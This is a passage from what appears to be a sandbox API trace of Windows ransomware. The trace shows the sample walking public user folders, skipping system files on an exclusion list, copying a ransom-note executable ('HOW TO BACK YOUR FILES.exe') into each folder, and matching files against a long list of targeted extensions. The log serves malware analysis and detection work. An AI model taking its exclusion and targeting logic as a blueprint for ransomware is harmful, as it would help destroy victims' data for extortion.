Flags=0x0, Size=0x34) returned 0x2ccfe8 [0039.650] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2248 | out: ListHead=0x2e77d0, ListEntry=0x2d2248) returned 0x2e7cd0 [0039.650] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="aoldtz.exe") returned 1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0039.650] lstrcmpiW (lpString1="Favorites", lpString2="temp") returned -1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="perflogs") returned -1 [0039.651] lstrcmpiW (lpString1="Favorites", lpString2="MSBuild") returned -1 [0039.651] lstrlenW (lpString="Favorites") returned 9 [0039.651] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0039.651] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0039.651] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Favorites", dwFileAttributes=0x12) returned 1 [0039.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0039.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cd028 [0039.651] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2268 | out: ListHead=0x2e77d0, ListEntry=0x2d2268) returned 0x2d2248 [0039.651] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49484f20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.651] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.651] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="aoldtz.exe") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="windows") returned -1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="bootmgr") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="temp") returned -1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="pagefile.sys") returned -1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="boot") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="ids.txt") returned 1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="ntuser.dat") returned -1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="perflogs") returned -1 [0039.651] lstrcmpiW (lpString1="Libraries", lpString2="MSBuild") returned -1 [0039.652] lstrlenW (lpString="Libraries") returned 9 [0039.652] lstrlenW (lpString="C:\\Users\\Public\\Favorites") returned 25 [0039.652] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0039.652] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries", dwFileAttributes=0x12) returned 1 [0039.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0039.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cd068 [0039.652] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2288 | out: ListHead=0x2e77d0, ListEntry=0x2d2288) returned 0x2d2268 [0039.652] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="aoldtz.exe") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="temp") returned -1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="perflogs") returned -1 [0039.652] lstrcmpiW (lpString1="Music", lpString2="MSBuild") returned 1 [0039.652] lstrlenW (lpString="Music") returned 5 [0039.652] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0039.652] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Music" | out: lpString1="Music") returned="Music" [0039.652] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music", dwFileAttributes=0x10) returned 1 [0039.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22a0 [0039.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ed100 [0039.653] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22a8 | out: ListHead=0x2e77d0, ListEntry=0x2d22a8) returned 0x2d2288 [0039.653] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="aoldtz.exe") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="temp") returned -1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="perflogs") returned 1 [0039.653] lstrcmpiW (lpString1="Pictures", lpString2="MSBuild") returned 1 [0039.653] lstrlenW (lpString="Pictures") returned 8 [0039.653] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0039.653] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0039.653] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures", dwFileAttributes=0x10) returned 1 [0039.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22c0 [0039.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2cd0a8 [0039.653] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22c8 | out: ListHead=0x2e77d0, ListEntry=0x2d22c8) returned 0x2d22a8 [0039.653] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="aoldtz.exe") returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2=".") returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="..") returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="windows") returned -1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="bootmgr") returned 1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="temp") returned -1 [0039.653] lstrcmpiW (lpString1="Recorded TV", lpString2="pagefile.sys") returned 1 [0039.654] lstrcmpiW (lpString1="Recorded TV", lpString2="boot") returned 1 [0039.654] lstrcmpiW (lpString1="Recorded TV", lpString2="ids.txt") returned 1 [0039.654] lstrcmpiW (lpString1="Recorded TV", lpString2="ntuser.dat") returned 1 [0039.654] lstrcmpiW (lpString1="Recorded TV", lpString2="perflogs") returned 1 [0039.654] lstrcmpiW (lpString1="Recorded TV", lpString2="MSBuild") returned 1 [0039.654] lstrlenW (lpString="Recorded TV") returned 11 [0039.654] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0039.654] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0039.654] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Recorded TV", dwFileAttributes=0x10) returned 1 [0039.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0039.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2cd0e8 [0039.654] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22e8 | out: ListHead=0x2e77d0, ListEntry=0x2d22e8) returned 0x2d22c8 [0039.654] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="aoldtz.exe") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="temp") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="perflogs") returned 1 [0039.654] lstrcmpiW (lpString1="Videos", lpString2="MSBuild") returned 1 [0039.654] lstrlenW (lpString="Videos") returned 6 [0039.654] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV") returned 27 [0039.654] lstrcpyW (in: lpString1=0x2e2e880, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0039.655] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos", dwFileAttributes=0x10) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2300 [0039.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ed138 [0039.655] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2308 | out: ListHead=0x2e77d0, ListEntry=0x2d2308) returned 0x2d22e8 [0039.655] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0039.655] FindClose (in: hFindFile=0x2ca380 | out: hFindFile=0x2ca380) returned 1 [0039.655] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2308 [0039.655] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0039.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed138 | out: hHeap=0x2b0000) returned 1 [0039.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2300 | out: hHeap=0x2b0000) returned 1 [0039.655] lstrlenW (lpString="C:\\Users\\Public\\Videos") returned 22 [0039.655] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0039.655] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0039.656] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0039.656] GetLastError () returned 0x0 [0039.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0039.656] ReadFile (in: hFile=0xf8, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0039.656] CloseHandle (hObject=0xf8) returned 1 [0039.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0039.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.656] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x494f7340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd128 [0039.656] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.656] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.656] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.656] FindNextFileW (in: hFindFile=0x2cd128, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x494f7340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x494f7340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.656] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.656] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.656] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.656] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.656] FindNextFileW (in: hFindFile=0x2cd128, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.656] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.656] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.656] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.656] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.657] lstrlenW (lpString="desktop.ini") returned 11 [0039.657] lstrlenW (lpString="C:\\Users\\Public\\Videos\\*") returned 24 [0039.657] lstrcpyW (in: lpString1=0x2e2e88e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.657] lstrlenW (lpString="desktop.ini") returned 11 [0039.657] lstrlenW (lpString="Ares865") returned 7 [0039.657] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.657] lstrlenW (lpString=".dll") returned 4 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.657] lstrlenW (lpString=".lnk") returned 4 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.657] lstrlenW (lpString=".ini") returned 4 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.657] lstrlenW (lpString=".sys") returned 4 [0039.657] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.657] lstrlenW (lpString="desktop.ini") returned 11 [0039.657] lstrlenW (lpString="bak") returned 3 [0039.657] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.657] lstrlenW (lpString="ba_") returned 3 [0039.657] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.657] lstrlenW (lpString="dbb") returned 3 [0039.657] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.657] lstrlenW (lpString="vmdk") returned 4 [0039.657] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.657] lstrlenW (lpString="rar") returned 3 [0039.657] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.657] lstrlenW (lpString="zip") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.658] lstrlenW (lpString="tgz") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.658] lstrlenW (lpString="vbox") returned 4 [0039.658] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.658] lstrlenW (lpString="vdi") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.658] lstrlenW (lpString="vhd") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.658] lstrlenW (lpString="vhdx") returned 4 [0039.658] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.658] lstrlenW (lpString="avhd") returned 4 [0039.658] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.658] lstrlenW (lpString="db") returned 2 [0039.658] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.658] lstrlenW (lpString="db2") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.658] lstrlenW (lpString="db3") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.658] lstrlenW (lpString="dbf") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.658] lstrlenW (lpString="mdf") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0039.658] lstrlenW (lpString="mdb") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0039.658] lstrlenW (lpString="sql") returned 3 [0039.658] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0039.658] lstrlenW (lpString="sqlite") returned 6 [0039.658] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.658] lstrlenW (lpString="sqlite3") returned 7 [0039.658] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.658] lstrlenW (lpString="sqlitedb") returned 8 [0039.658] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.659] lstrlenW (lpString="xml") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.659] lstrlenW (lpString="$er") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.659] lstrlenW (lpString="4dd") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.659] lstrlenW (lpString="4dl") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.659] lstrlenW (lpString="^^^") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.659] lstrlenW (lpString="abs") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.659] lstrlenW (lpString="abx") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.659] lstrlenW (lpString="accdb") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.659] lstrlenW (lpString="accdc") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.659] lstrlenW (lpString="accde") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.659] lstrlenW (lpString="accdr") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.659] lstrlenW (lpString="accdt") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.659] lstrlenW (lpString="accdw") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.659] lstrlenW (lpString="accft") returned 5 [0039.659] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.659] lstrlenW (lpString="adb") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.659] lstrlenW (lpString="adb") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.659] lstrlenW (lpString="ade") returned 3 [0039.659] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.659] lstrlenW (lpString="adf") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.660] lstrlenW (lpString="adn") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.660] lstrlenW (lpString="adp") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.660] lstrlenW (lpString="alf") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.660] lstrlenW (lpString="ask") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.660] lstrlenW (lpString="btr") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.660] lstrlenW (lpString="cat") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.660] lstrlenW (lpString="cdb") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.660] lstrlenW (lpString="ckp") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.660] lstrlenW (lpString="cma") returned 3 [0039.660] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.660] lstrlenW 